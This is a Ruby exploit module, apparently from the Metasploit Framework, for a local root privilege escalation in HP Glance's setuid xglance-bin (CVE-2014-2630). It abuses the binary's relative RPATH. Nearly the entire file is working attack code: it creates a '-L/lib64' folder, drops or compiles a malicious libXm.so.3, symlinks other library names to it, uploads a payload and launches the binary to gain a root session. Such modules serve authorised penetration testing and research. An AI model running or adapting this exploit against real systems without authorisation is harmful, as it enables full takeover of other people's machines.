GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/hp_xglance_priv_esc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
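# Local privilege escalation against HP Glance's setuid xglance-bin (CVE-2014-2630).
#
# The binary carries a *relative* RPATH entry, "-L/lib64", so when it is started
# with a working directory the attacker controls, the dynamic loader resolves its
# libX* dependencies from "<cwd>/-L/lib64/" first. Dropping a malicious
# libXm.so.3 (plus symlinks for the other candidate names) there and launching
# the binary from that directory runs our library as root.
class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Name under which the malicious library is dropped; the other candidate
  # library names are symlinked to it.
  HIJACKED_LIB = 'libXm.so.3'.freeze

  # Extra names linked to HIJACKED_LIB on top of whatever find_libs reports.
  # Xp and Xt were linked by the original exploit; the mock binary used during
  # development was also exploitable through libXmu.so.6. Whether the real
  # binary ever loads libXmu is unconfirmed, so it is kept "just to be safe".
  EXTRA_LIBS = %w[libXp.so.6 libXt.so.6 libXmu.so.6].freeze

  # Path the pre-compiled data/exploits/CVE-2014-2630/libXm.so.3 executes.
  # The C source in the same data directory is expected to embed this exact
  # literal so live compilation can swap in a random path -- TODO confirm
  # against CVE-2014-2630.c; stage_hijack_library fails loudly if it does not.
  PRECOMPILED_PAYLOAD_PATH = '/tmp/.u4aLoiq'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Performance Monitoring xglance Priv Esc',
        'Description' => %q{
          This exploit takes advantage of xglance-bin, part of
          HP's Glance (or Performance Monitoring) version 11 'and subsequent'
          , which was compiled with an insecure RPATH option. The RPATH includes
          a relative path to -L/lib64/ which can be controlled by a user.
          Creating libraries in this location will result in an
          escalation of privileges to root.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Tim Brown', # original finding
          'Robert Jaroszuk', # exploit
          'Marco Ortisi', # exploit
        ],
        'Platform' => [ 'linux' ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [ 'Automatic', {} ],
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
        ],
        'Privileged' => true,
        'References' => [
          [ 'EDB', '48000' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
          [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
          [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],
          [ 'PACKETSTORM', '156206' ],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
          [ 'CVE', '2014-2630' ]
        ],
        'DisclosureDate' => '2014-11-19',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options [
      OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])
    ]
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Directory the operator has declared writable (advanced option WritableDir).
  # It doubles as the working directory xglance-bin is launched from.
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Directory the relative RPATH entry "-L/lib64" resolves to when the binary
  # runs with base_dir as its working directory. Keeps the trailing slash so
  # callers can append a file name directly.
  def exploit_folder
    "#{base_dir}/-L/lib64/"
  end

  # Path to the setuid xglance-bin on the target (option GLANCE_PATH).
  def glance_path
    datastore['GLANCE_PATH'].to_s
  end

  # Reads +file+ (the C source or the pre-built .so) from
  # data/exploits/CVE-2014-2630 inside the framework's data directory.
  # Binary-safe so the pre-compiled library survives the round trip.
  def exploit_data(file)
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
  end

  # Name of the libX* library that ldd reports as resolving through the
  # relative "-L/lib64" RPATH entry, or nil when no such entry is found
  # (patched build, or ldd unavailable on the target).
  #
  # NOTE(review): ldd may run the inspected file's loader; GLANCE_PATH is
  # operator supplied, so only point it at the binary you mean to inspect.
  def find_libs
    ldd_output = cmd_exec "ldd #{glance_path} | grep libX"
    match = %r{(?<lib>libX.+\.so\.\d) => -L/lib64}.match(ldd_output)
    match && match[:lib]
  end

  # Vulnerable only if the binary exists, is setuid, and still links a libX*
  # library through the relative RPATH entry.
  def check
    return CheckCode::Safe("#{glance_path} file not found") unless file? glance_path
    return CheckCode::Safe("#{glance_path} is not setuid") unless setuid? glance_path

    lib = find_libs
    if lib.nil?
      vprint_error 'Patched xglance-bin, not linked to -L/lib64/'
      return CheckCode::Safe
    end
    vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"
    CheckCode::Appears
  end

  # Stages the hijack library and payload under base_dir, then launches the
  # setuid binary from there. Files are registered with FileDropper so the
  # root session that comes back removes them.
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable? base_dir
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    prepare_exploit_folder
    payload_path = stage_hijack_library

    vprint_status 'uploading payload'
    upload_and_chmodx payload_path, generate_payload_exe
    register_file_for_cleanup payload_path

    link_libraries
    launch_xglance
  end

  # Recreates "<base_dir>/-L/lib64/" from scratch (a failed earlier attempt may
  # have left it behind) and registers the whole "-L" tree for cleanup.
  def prepare_exploit_folder
    vprint_status("Deleting exploit folder: #{base_dir}/-L")
    cmd_exec("rm -rf \"#{base_dir}/-L\"")
    vprint_status("Creating exploit folder: #{exploit_folder}")
    cmd_exec("mkdir -p \"#{exploit_folder}\"")
    register_dir_for_cleanup "#{base_dir}/-L"
  end

  # Drops the malicious libXm.so.3 into exploit_folder and returns the path
  # that library executes as root (where the payload must then be uploaded).
  #
  # gcc on the target is preferred over metasm: metasm strips unused symbols,
  # and xglance-bin needs those exported so it resolves them and actually
  # starts, instead of aborting before our constructor runs. Without gcc the
  # pre-built library is dropped, which is hard-wired to PRECOMPILED_PAYLOAD_PATH.
  def stage_hijack_library
    so_file = "#{exploit_folder}#{HIJACKED_LIB}"

    unless live_compile?
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx so_file, exploit_data(HIJACKED_LIB)
      return PRECOMPILED_PAYLOAD_PATH
    end

    vprint_status 'Live compiling exploit on system...'
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    code = exploit_data('CVE-2014-2630.c')
    # Swap the placeholder path baked into the source for our random one. The
    # previous code substituted payload_path with itself (a no-op), so the
    # compiled library kept executing the placeholder while the payload was
    # uploaded elsewhere. String#sub! returns nil when nothing was replaced.
    unless code.sub!(PRECOMPILED_PAYLOAD_PATH, payload_path)
      fail_with(Failure::Unknown, "Placeholder #{PRECOMPILED_PAYLOAD_PATH} not found in CVE-2014-2630.c, cannot inject payload path")
    end
    upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'
    rm_f "#{so_file}.c" # upload_and_compile leaves the source next to the library
    payload_path
  end

  # Symlinks every library name xglance-bin might pull through the relative
  # RPATH to the dropped HIJACKED_LIB. find_libs can be nil here (check skipped
  # via ForceExploit), and may repeat a name from EXTRA_LIBS or HIJACKED_LIB
  # itself, so the list is compacted and de-duplicated first.
  def link_libraries
    cd exploit_folder
    names = (EXTRA_LIBS + [find_libs]).compact.uniq - [HIJACKED_LIB]
    names.each do |name|
      cmd_exec "ln -s #{HIJACKED_LIB} #{name}"
    end
  end

  # Runs the setuid binary. The RPATH entry is relative, so the loader resolves
  # "-L/lib64/" against the working directory: it must be started from base_dir.
  def launch_xglance
    print_status 'Launching xglance-bin...'
    cd base_dir
    output = cmd_exec glance_path
    output.each_line { |line| vprint_status line.chomp }
    print_warning("Manual cleanup of #{exploit_folder} may be required")
  end
end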